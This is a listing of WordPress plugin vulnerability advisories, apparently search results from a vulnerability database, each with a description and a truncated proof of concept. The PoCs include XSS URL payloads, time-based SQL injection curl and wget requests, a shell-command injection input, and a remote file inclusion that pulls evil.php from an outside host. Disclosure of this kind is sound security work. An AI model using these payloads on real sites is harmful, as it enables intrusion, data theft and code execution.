14603 matches found
Rating by BestWebSoft < 1.6 - Rating Denial of Service
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating PoC Under Settings - Discussion, uncheck "Comment must be manually approved" Install and Enable Rating BestWebSoft plugin Change...
Like Button Rating < 2.6.45 - Arbitrary e-mail Sending
The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body PoC As a subscriber, run the below command in the web developer console of the browser fetch"/wp-admin/admin-ajax.php?action=likebtntestvotenotification", "headers":...
Discy < 5.2 - Settings Update via CSRF
The theme lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary plugin's settings including payment methods via a CSRF attack PoC...
Easy FAQ with Expanding Text <= 3.2.8.3.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its settings, allowing high privilege users to perform Cross-Site Scripting attacks when unfilteredhtml is disallowed PoC Put the following payload in any of the plugin's settings such as Font size, Font Color and save: "...
Form Maker By 10Web < 1.14.12 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitize and escape the Custom Text settings, which could allow high privilege user such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed PoC In a form settings, put the following payload in the Actions after submission Action Type Custom...
Advanced Image Sitemap <= 1.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the PHPSELF PHP variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting. PoC https://example.com/wp-admin/options-general.php/%22%3E%3Csvg/onload=alert/xss/%3E?page=ais...
Modern Events Calendar Lite < 6.5.2 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some parameters, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks when unfilteredhtml is disallowed...
SEMA API < 4.02 - Unauthenticated SQLi
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users PoC v 3.64: curl http://example.com/wp-admin/admin-ajax.php --data 'action=getsemadata=attributes=-3 UNION ALL...
Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection PoC curl 'http://example.com/?restroute=/olistener/new' --data '"id":" SELECT SLEEP3"' -H 'content-type: application/json'...
Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escaped imported CSV data, which could allow high privilege users to import malicious javascript code and lead to Stored Cross-Site Scripting issues PoC As admin, import the below CSV file via Tools Import and export users and customers /wp-admin/tools.php?page=ac...
WP-Appbox < 4.4.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed...
Tipsacarrier <= 1.4.4.2 - Unauthenticated Orders Disclosure
The plugin does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL Vendor was notified on November 26th, 2021, did not reply nor fix the...
Pricing Table <= 1.5.2 - Author+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks...
One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload
The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files such as PHP even when FILEMODS and FILEEDIT are disallowed PoC Access Tools Import One Click Demo Import Run Importer and import dummy XML file can be empty Intercept the request...
WP Block and Stop Bad Bots < 6.88 - Unauthenticated SQLi
The plugin does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue PoC GET / HTTP/1.1 User-Agent: '+SLEEP5-- g Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8...
Popup Builder < 4.1.1 - SQL Injection to Reflected Cross-Site Scripting
The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a...
Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure
The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to...
3D FlipBook < 1.12.1 - Subscriber+ Stored Cross-Site Scripting
The plugin does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook. PoC As a subscriber:...
WP Content Copy Protection & No Right Click < 3.4.5 - Settings Update via CSRF
The plugin does not have CSRF check when updating its settings, allowing attackers to make logged in admin update them via a CSRF attack...
YOP Poll < 6.3.5 - Author+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of the settings available to users with a role as low as author before outputting them, leading to a Stored Cross-Site Scripting issue PoC As author, put the following payload in the Settings Integration Use Google reCaptcha Yes Site Key: v v 6.3.5 - "...
Email Subscribers & Newsletters < 5.3.2 - Unauthenticated arbitrary option update
The plugin lacks both authentication and nonce checks in its esdismissadminnotice function, allowing an external attacker to set arbitrary plugin options to "yes". PoC https://example.com/?optionname=userrolesdismissadminnotice=1 This will set the option igesuserroles to "yes"...
WP Statistics < 13.1.5 - Unauthenticated Blind SQL Injection
The plugin is vulnerable to unauthenticated SQL Injection via the exclusionreason parameter due to missing parameterization and escaping in the SQL query found on line 88 of the /includes/class-wp-statistics-exclusion.php file when the Record Exclusions feature is enabled. PoC Step 1: Insert "aaa...
Multisite User Sync/Unsync < 2.1.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the wmussourceblog and wmusrecordperpage parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues PoC...
NotificationX < 2.3.9 - Unauthenticated Blind SQL Injection
The plugin does not sanitise and escape the nxid parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection PoC time wget 'https://example.com/?restroute=/notificationx/v1/analytics' --post-data="nxid=sleep2 -- x" -q -O-...
WordPress GDPR & CCPA < 1.9.26 - Authenticated Reflected Cross-Site Scripting
The checkprivacysettings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript...
Popup Builder < 4.0.7 - LFI to RCE
The plugin does not validate and sanitise the sgpbtype parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR PoC Create a zip...
WordPress Download Manager < 3.2.34 - Authenticated SQL Injection to Reflected XSS
The plugin does not sanitise and escape the packageids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue PoC...
ProfileGrid < 4.7.5 - Subscriber+ Stored Cross-Site Scripting
The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient escaping via the pmuseravatar and pmcoverimage parameters found in the /admin/class-profile-magic-admin.php file which allows attackers with authenticated user access, such as subscribers, to inject arbitrary web scripts...
Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting
The plugin does not escape some of the Form settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Go to the AJAX settings of a Form and put the following payload in the "Minimum number of characters...
IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF
The plugin does not have CSRF check in the ip2locationcountryblockersaverules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend. PoC Make an admin open a page with the following code in it,...
WP Post Page Clone < 1.2 - Unauthorised Post Access
The plugin allows users with a role as low as Contributor to clone and view other users' draft and password-protected posts which they cannot view normally. PoC Go to All Posts, find the post to clone, click "Click to Clone" then edit the cloned post to see its content...
Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the fileurl before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting PoC https://example.com/wp-admin/admin.php?page=woo-orders-tracking-import-csvurl=%3Cimg+src+onerror%3Dalert%281%29%3Ewoterror=2...
The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure
The plugin does not validate the qvquery parameter of the tpgetdlpostinfoajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts PoC The following request allow an unauthenticated user to get the draft posts the nonce can be...
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed PoC Put the following payload in the "Duplicate Title" or "Duplicate...
WP Guppy < 1.3 - Sensitive Information Disclosure
The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user PoC !/bin/bash Exploit Title:...
Preview E-mails for WooCommerce < 2.0.0 - Reflected Cross-Site Scripting
The plugin is vulnerable to reflected XSS via the searchorder parameter found in the /views/form.php file. PoC...
Directorist – Business Directory Plugin < 7.0.6.2 - CSRF to Remote File Upload
The plugin was vulnerable to Cross-Site Request Forgery to Remote File Upload leading to arbitrary PHP shell uploads in the wp-content/plugins directory. This vulnerability was seen actively exploited by Sucuri in the wild for ransomware attacks. PoC 1. Authenticate as any user. 2. Paste below...
Auto Featured Image < 3.9.3 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the postid parameter before outputting back in an admin page within a JS block, leading to a Reflected Cross-Site Scripting issue. PoC https://example.com/wp-admin/upload.php?page=menu-media-aptid=alert/XSS/...
Contact Form 7 Database Addon < 1.2.6.1 - Arbitrary Form Deletion via CSRF
The plugin does not have CSRF check when processing bulk actions, which could allow attackers to make logged in admin delete arbitrary forms for example...
Sassy Social Share 3.3.23 - Missing Access Controls to PHP Object Injection
Version 3.3.23 of the Sassy Social Share WordPress plugin is vulnerable to PHP Object Injection via the wpajaxheateorsssimportconfig AJAX action due to a missing capability check in the importconfig function found in the /admin/class-sassy-social-share-admin.php file along with the implementation...
Download Monitor < 4.4.5 - Admin+ SQL Injection
The plugin does not properly validate and escape the "orderby" GET parameter before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue PoC There need to be at least one log for the payload to trigger...
MyBB Cross-Poster <= 1.0 - Admin+ Stored Cross-Site Scripting
The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /classes/MyBBXPSettings.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site...
NinjaForms < 3.5.8.2 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the custom class name of the form field created, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC With the Form Builder "Dev Mode” setting enabled, create a form and a...
jQuery Reply to Comment <= 1.31 - CSRF to Stored Cross-Site Scripting
The plugin does not have any CSRF check when saving its settings, nor sanitise or escape its 'Quote String' and 'Reply String' settings before outputting them in Comments, leading to a Stored Cross-Site Scripting issue. PoC Put the following payload in the 'Quote String' or 'Reply String' setting...
LearnPress < 4.1.3.1 - Multiple Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitize or escape various inputs within course settings, which could allow high privilege users to perform Cross-Site Scripting attacks when the unfiltredhtml capability is disallowed PoC When adding new courses, the following fields can have XSS payloads like "...
PDF Light Viewer < 1.4.12 - Authenticated Command Injection
The plugin allows users with Author roles to execute arbitrary OS command on the server via OS Command Injection when invoking Ghostscript. PoC 1 Go to Import PDF. 2 Select PDF file. 3 Set compression as 60 | calc | echo 4 Toggle import the first checkbox 5 Publish or update 6 Command executes...
Simple Social Media Share Buttons < 3.2.4 - Authenticated Stored Cross-Site Scripting
The plugin does not escape the Share Title settings before outputting it in the frontend pages or posts depending on the settings used, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Put the following payload in the...
Feedify Web Push Notifications <= 2.1.8 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the eedifymsg parameter found in the /includes/base.php which allows attackers to inject arbitrary web scripts...
MoolaMojo <= 0.7.4.1 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the classes parameter found in the /views/button-generator.html.php file which allows attackers to inject arbitrary web scripts...